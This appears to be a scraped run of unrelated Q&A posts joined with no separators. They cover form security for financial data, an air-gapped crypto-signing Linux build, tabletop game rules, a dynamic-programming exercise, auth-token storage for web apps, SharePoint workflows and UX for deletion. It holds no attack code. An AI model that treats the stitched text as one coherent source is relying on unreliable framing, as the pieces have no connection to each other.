What security concerns are there regarding website users inputting personal financial data without putting in personally identifying data?

I am a web developer, but I have only a rudimentary grasp of security, e.g., be careful to sanitize inputs, store as little user data as possible, encrypt passwords, keep up with security issues of libraries and packages, etc.

Today, I was approached by a client who does financial planning about replacing a spreadsheet he gives clients with a web-based form. The spreadsheet asks users to input certain financial data – e.g., current value of various investment accounts, business interests, etc. These numbers are put into a formula and a value is generated which is supposed to help the user decide whether the consulting could be useful to them.

The phone call was very short, and my questions focused on more mundane matters about user experience, desired UI elements, etc. No commitments have been made, and I’m analyzing the project to see if it’s something I can do. I began to think about potential security issues, and I realized I really don’t know where to start. So far it seems that client wants the form to be accessed via a magic link, and that the user would not enter any personally identifying information. I do not know yet whether my potential client wants to store the value generated, a simple dollar amount which is the ‘benefit’ the user could get by using the service. The impression I got is that my potential client simply wants to use this value as a motivator for clients to inquire further about his services.

My question is this: In this scenario, what security-related matters should I consider?

Thank you.

Putting together an air-gap ephemeral linux OS to run off RAM

Idea: Have an operating system boot from a bootable medium completely into RAM. There is no storage attached to this system, so once it boots up and we eject the bootable medium, this system is completely running off RAM & its not capable of leaving a trace anywhere except RAM, contents of which are hard to recover without physical access to the system.

Premises: There is no physical access to this system, which makes a whole set of attacks possible, but lets compile a list of attacks like Cold boot attacks etc, that possess a threat to this setup, and we can assess the severity of each one of them.

Use-case: Using as a vault for cryptocurrency storage & signing transactions.

Stack:

  • Hardware: Raspberry Pi / Old Computer (which may or may not have wifi/bluetooth hardware available, latter preferred obviously)
  • Custom Linux OS (Functional Display + Touchscreen drivers + Camera drivers + Absence of WiFi / Bluetooth drivers + Modern Browser + On-screen keyboard)
  • Binary (Golang program running a local server & UI accessed via browser)

Things that may or may not matter:

  • CPU architecture: x86 / ARM
  • Bootable media: USB drive / SD card

Communication medium with air-gap system: QR codes

Since this only requires little information to be passed to & fro, using QR codes to encode/decode JSON payload seems ideal.

Explanation: Boot up the computer & eject bootable medium. Run the program and access UI in a browser by going to localhost:3000. Generate the keys (Sensitive information) or import if you already have those keys generated in a previous run. Scan QR code to receive the unsigned transaction, show confirmation, sign it and then encode signed transaction as QR code and display it.

The bootable media that’s in use, will never be plugged back into a system connected to the internet as an additional security measure, but with the ability to eject bootable medium after boot up, makes this unnecessary.

Building Custom Linux OS: This is where I want to crowd source knowledge:

  • What OS to choose to build upon + what packages to use + what packages to remove?
  • What would be a simpler approach to building this OS?
  • How to build a lean & minimal distro which can run on a system as low as 512 MB RAM (the less the better), provided the OS footprint is around 100-20 MB of RAM, leaving the rest for the program to use.
  • Expose attack vectors in this approach.

End Goal: Present the source-code + instructions and host the distro for download to use as a cryptocurrency vault along with the wallet app that will be open-sourced with the option of choosing a hosted service for that as well. Considering the architecture, people can simply use it without even requiring to trust/verify the system, as long as they can maintain the air-gap of the vault.

How much time does putting an item inside a Bag of Holding take when you are fighting?

In the Bag of Holding’s (Dungeon Master’s Guide pag. 248) description it is stated:

Retrieving a specific item from a bag of holding is a move action — unless the bag contains more than an ordinary backpack would hold, in which case retrieving a specific item is a full-round action.

I am wondering how much time is required to put an item inside the bag while you are engaged in a combat encounter. Should it be considered as a move action as well? Should it be a free action if the item is small enough?

I have found this question that is almost the same as this one: How long does it take to place an item in a Bag of Holding or Portable Hole?

The only thing that has not been made clear is: does the item’s size influence the time I must spend to put something inside the bag?

Ex: Does a rod take more time than a ring? What about an halberd and a sword?

Putting Blocks in Boxes Untill th height is met Using Dynamic Programming

I am pretty new in the field of DP. My friend recently gave me a question from one of his old assignments to solve and practice and I am stuck at it.

The question says:

Given n blocks of same height and width but the different thickness and list B = (b_1, . . . , b_n) of the thickness of the block, define a DP algorithm to fit all the blocks in k boxes where each box can fit t thickness of blocks at most.

I was thinking of putting as many blocks in the first 2 boxes and the third one will be filled with the left blocks. But I have no idea how to break it down into the subproblems and create the base cases to define the time required. Any help will be appreciated. The given time complexity is O(nt^2).

Thanks!

If someone is under the effect of microcosm, does putting the physical body in quintessence affect their dream world?

Does putting someone’s physical body in quintessence, thus removing them from the time stream, also remove them from the dream demiplane their mind was sent to by Microcosm?

The point of this is to see if we can separate the mind and body and use Dream Travel to go to the dream created by Microcosm, with the body of the dreamer safely stored in Quintessence.

All of this assumes that Microcosm does create a dream demiplane, which by RAW may be dubious. But if it does, cheap pocket plane with better time traits we could otherwise get. Downside: dealing with monsters of the dream world might suck. Upside, pretty hard to get there if you’re not a creature related to dreams.

is putting authentication tokens inside HTML body safe?

I have a project, a webapp/website that uses cookies to authenticate users with long randomly generated strings (also with samesite:lax, httponly, secure), however I also have an API which itself needs authentication tokens.

My current design is when the website server authenticates the user it generates the API authToken and injects along with the total initial state of the page and then the API requests are served with this authToken, is this flow inherently flawed? I thought of using an extra HTTP request after page loading to get the API authToken and thus avoid putting it inside the HTML body but that means more slowness since the page contents is usually dependent on the API requests which need an extra HTTP request after the page load to get the API authToken. I assume the connection is already over HTTPS of course.

Are the trade offs for putting an auth token in an http-only cookie for an SPA worth it?

I’ve been building a web app (rails api + react SPA) for learning / fun and have been researching authentication. The most commonly recommended approach for authenticating SPAs that I have read is to put the auth token (such as a JWT) in a secure HTTP-only cookie to protect from XSS. This seems to have a couple of consequences:

  • We now have to handle CSRF since we are using cookie authentication
  • Since it’s an SPA we can’t protect against CSRF until the user is logged in, which means we are vulnerable to a login phishing attach (https://stackoverflow.com/questions/6412813/do-login-forms-need-tokens-against-csrf-attacks)

But what is the real downside to just storing the auth token in browser storage (i.e. session storage)? XSS becomes slightly more convenient for the attacker? Even with an HTTP-only cookie the attacker can still use the auth token by making requests directly from the site, because if there’s a XSS vulnerability then they don’t need to be able to read the token to use it.

It seems that the popular recommendation just makes things more complicated to protect against CSRF just to make things a little more difficult for the attacker in the case of XSS. Due to the amount of resources making these recommendations I feel like I am missing something and would appreciate any feedback or clarifications!

Here is a couple of sources I’ve been reading that have been quite adamant against browser storage for auth tokens:

  • https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html
  • https://jwt.io/introduction/
  • https://auth0.com/docs/security/store-tokens

Putting a multiple choice checkbox in a workflow in Sharepoint Designer 2013

I have a column in my SP which asks if 3 things are done and a checkbox for each. Once all 3 are checked as being done, I’d like an email sent to certain people in my Workflow. I don’t understand how to get the checkbox options to be in the workflow. I’m sorry I’m not sure how else to word this, but I’ll be happy to try to clarify if I’m not being clear.

I need this:

column

to relate to my workflow here but I only see Yes/No options in the value If/Then statements: enter image description here

How do you encourage deletion of something without putting the user off?

Scenario: A manager has access to her team members data on an internal system. She also has access to certain team members that have since moved to another role or under another manager.

We want the managers to keep their employee roster up to date so it would be helpful if these managers “deleted” people they no longer are responsible for.

Through testing I received feedback that this remove feature was ignored because they don’t want to mess up the database. The problem is the database is a mess because we have duplicates and crossed wires, so we need the managers to use this remove feature. So my question is how can I improve this component to actively encourage data cleansing?

enter image description here